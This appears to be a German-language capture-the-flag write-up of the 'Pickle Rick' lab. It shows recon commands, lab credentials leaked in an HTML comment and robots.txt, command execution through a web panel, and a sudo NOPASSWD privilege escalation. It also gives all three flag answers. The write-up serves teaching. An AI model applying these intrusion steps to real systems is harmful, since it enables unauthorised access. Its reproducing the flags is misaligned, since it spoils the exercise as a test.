Pickle Rick CTF – 0xRoshiSh3ll Writeup

01Einführung

Rick Sanchez hat es mal wieder verbockt — diesmal hat er sich selbst in eine Gurke verwandelt und kommt nicht zurück. Er braucht drei geheime Zutaten für ein Gegenmittel. Deine Aufgabe: hack dich in sein System, finde alle drei Ingredients und rette den alten Mann.

Diese Box kombiniert klassische Web-Enumeration mit Command Injection über ein verstecktes Command Panel — perfekt um das Zusammenspiel von Recon, Credential Hunting und Linux-Befehlen zu üben.

💡

Schwierigkeit: Easy | OS: Linux | Ziel: 3 Ingredients | Kategorie: Web, RCE

02Reconnaissance — Was läuft da?

Wir wissen: irgendwo da draußen wartet Ricks Server. Bevor wir irgendetwas tun, scannen wir die Maschine. Nmap zeigt uns die gesamte Angriffsfläche.

nmap -sC -sV 10.10.22.23

Starting Nmap 7.94 ...

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2
80/tcp open  http    Apache httpd 2.4.18
| http-title: Rick is sup4r cool

→ Zwei offene Ports: SSH (22) und HTTP (80)
→ Webserver läuft auf Apache
→ Port 80 ist unser Einstieg

🔍

SSH auf Port 22 und ein Webserver auf Port 80. Der Webserver ist unsere Angriffsfläche.

03Web Enumeration — Port 80

Browser auf, Ziel-IP rein. Die Seite begrüßt uns mit einem Rick-and-Morty-Theme — schön und gut, aber wir sind nicht hier um Cartoons zu schauen. Erster Blick: kaum Inhalt, ein Bild und Text über Ricks Missgeschick.

Rick ist sup4r cool — die Startseite der Maschine

🧠

Erste Regel: immer den Source Code prüfen. Was du siehst ist nicht alles — was versteckt ist, ist meistens viel interessanter.

04Source Code — Erster Treffer

Rechtsklick → View Page Source. Wir durchwühlen den HTML-Code. Zeile 32 — Jackpot. Jemand hat einen Benutzernamen in einem HTML-Kommentar hinterlassen. Das ist kein Zufall. Das ist Fahrlässigkeit.



→ Username gefunden: R1ckRul3s
→ Notieren — wird noch gebraucht!

🎯

Username gefunden: R1ckRul3s — direkt im HTML-Kommentar. Klassischer OPSEC-Fehler. Jetzt brauchen wir nur noch das Passwort.

05Nikto & Dirbuster — Jede Tür klopfen

Wir haben einen Username — jetzt brauchen wir eine Login-Seite. Nikto scannt den Server auf bekannte Schwachstellen und versteckte Pfade.

nikto -h 10.10.22.23

+ Server: Apache/2.4.18 (Ubuntu)
+ /login.php: Admin login page found.
+ /robots.txt: contains 1 entry which should be manually viewed.

→ /login.php — genau das was wir gesucht haben!
→ robots.txt — könnte etwas Interessantes enthalten

dirbuster -u http://10.10.22.23 -l /usr/share/dirb/wordlists/common.txt

+ /index.html    (Status: 200)
+ /login.php      (Status: 200)
+ /robots.txt     (Status: 200)
+ /assets/        (Status: 301)

→ Alle bestätigt — robots.txt als nächstes!

🔍

Login-Seite gefunden: /login.php. Und die robots.txt wartet — sie könnte das fehlende Passwort liefern.

06robots.txt → Das Passwort liegt offen

Die robots.txt ist eigentlich dazu da um Suchmaschinen zu steuern. Hier hat jemand etwas anderes damit gemacht — etwas sehr ungeschicktes.

robots.txt — Wubbalubbadubdub als einziger Eintrag

Wubbalubbadubdub

→ Ricks typischer Catchphrase — hier als einziger Eintrag
→ Das riecht stark nach einem Passwort
→ Kombinieren: User = R1ckRul3s | Pass = Wubbalubbadubdub

Direkt ab zur /login.php. Username: R1ckRul3s, Passwort: Wubbalubbadubdub — und wir sind drin.

Portal Login Page — Rick und Morty Style

Command Panel — nach erfolgreichem Login erreichbar

✅

Zugriff erhalten! Kein Bruteforce, kein Exploit — nur offene Augen. Das Command Panel wartet auf unsere Befehle.

07Command Panel — Remote Code Execution

Das Dashboard zeigt ein Command Panel — ein Eingabefeld das direkt Linux-Befehle auf dem Server ausführt. Das ist Remote Code Execution auf dem Silbertablett. Wir checken zuerst was im Verzeichnis liegt.

ls

ls Output — Sup3rS3cretPickl3Ingred.txt springt ins Auge

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

→ Sup3rS3cretPickl3Ingred.txt — klingt vielversprechend!
→ cat ist geblockt — kein Problem, wir haben andere Wege

⚠️

cat ist auf diesem System geblockt. Spoiler: es reicht trotzdem nicht.

08Ingredient #1 — Direkt vom Webserver

cat ist geblockt — kein Problem. Der Webserver liefert die Datei direkt im Browser aus. Wir rufen sie einfach über die URL auf.

Direktaufruf: 10.10.22.23/Sup3rS3cretPickl3Ingred.txt im Browser

http://10.10.22.23/Sup3rS3cretPickl3Ingred.txt

Output: mr. meeseek hair

→ Ingredient #1 gesichert!

#1

Erste Zutat für Ricks Gegenmittel

mr. meeseek hair

💡

cat geblockt? Alternativen: less, more, head, tail — oder direkt im Browser aufrufen.

09Directory Traversal — Tiefer ins System

Ingredient 1 ist secured. Zwei fehlen noch. Zeit tiefer zu graben — vom aktuellen Webroot bis zum Root-Level.

cd ../../../../; ls -al; pwd

Directory Traversal — Root-Level Verzeichnisliste

total 88
drwxr-xr-x  23 root root 4096 Oct 26 14:34 .
drwxr-xr-x   2 root root 4096 Nov 14  2018 bin
drwxr-xr-x   4 root root 4096 Oct 26 14:34 home
drwx------   4 root root 4096 Feb 10  2019 root
...

/

→ Root-Level erreicht!
→ /home und /root sind unsere nächsten Ziele

🔍

Root-Level erreicht! /home und /root — beide werden wir besuchen.

📁 /home Verzeichnis erkunden

cd /home; ls -al; pwd

cd /home Befehl im Command Panel

cd /home/rick; ls -al

/home/rick — second ingredients Datei sichtbar

total 12
drwxrwxrwx 2 rick rick 4096 Feb 10 2019 .
drwxr-xr-x 4 root root 4096 Feb 10 2019 ..
-rwxrwxrwx 1 root root   13 Feb 10 2019 second ingredients

/home/rick

→ "second ingredients" — genau was wir suchen!

10Ingredient #2 — Ricks Geheimversteck

cat ist noch immer geblockt — aber less funktioniert problemlos.

less /home/rick/"second ingredients"

1 jerry tear

→ Ingredient #2 gefunden!
→ Zwei von drei. Fast geschafft.

#2

Zweite Zutat für Ricks Gegenmittel

1 jerry tear

11Sudo Check — Der Jackpot

Die letzte Zutat liegt im /root Verzeichnis. Wir prüfen zuerst unsere Sudo-Rechte.

sudo -l Befehl im Command Panel

sudo -l

sudo -l Output — NOPASSWD: ALL

User www-data may run the following commands:
    (ALL) NOPASSWD: ALL

→ NOPASSWD: ALL
→ Wir dürfen JEDEN Befehl als Root ausführen — ohne Passwort
→ Für uns: absoluter Jackpot 💀

⚠️

NOPASSWD: ALL — katastrophale Fehlkonfiguration. Für uns: die Hintertür zu Ingredient #3.

📁 /root auflisten

sudo ls /root

sudo ls /root — 3rd.txt sichtbar

3rd.txt
snap

→ 3rd.txt — das ist sie. Die letzte Zutat.

12Ingredient #3 — Root. Game Over.

Letzter Schritt. Root-Rechte, kein Passwort, kein Hindernis.

sudo less /root/3rd.txt Befehl

sudo less /root/3rd.txt

fleeb juice

→ Ingredient #3 gefunden.
→ Alle drei Zutaten gesammelt.
→ Rick kann wieder Mensch werden.
→ System vollständig kompromittiert. Access granted. 💀

#3

Dritte und letzte Zutat

fleeb juice

👑

Mission Complete. Alle drei Ingredients gefunden. Von der ersten Login-Seite bis zum vollständig kompromittierten System. Access granted. 💀

13Fazit & Lernpunkte

Pickle Rick zeigt wie viele Schwachstellen aus simplen Admin-Fehlern entstehen. Kein komplexer Exploit, kein Zero-Day — nur offene Augen, systematische Enumeration und das Wissen wo man suchen muss.

Source Code immer prüfen — Credentials in HTML-Kommentaren sind ein Klassiker
robots.txt enthält oft mehr als erwartet — immer als erstes lesen
Nikto + Dirbuster kombinieren — gemeinsam verpassen sie nichts
cat geblockt? less, more, head oder Direktaufruf im Browser
sudo -l immer nach initialem Zugriff — NOPASSWD: ALL ist der absolute Jackpot
Directory Traversal: cd ../../../../ bringt dich ans Root-Level
Command Panel = RCE — jedes Web-Interface das Befehle ausführt ist ein Angriffspunkt

📚

THM Pickle Rick Room · Tools-Sheet · Linux-Sheet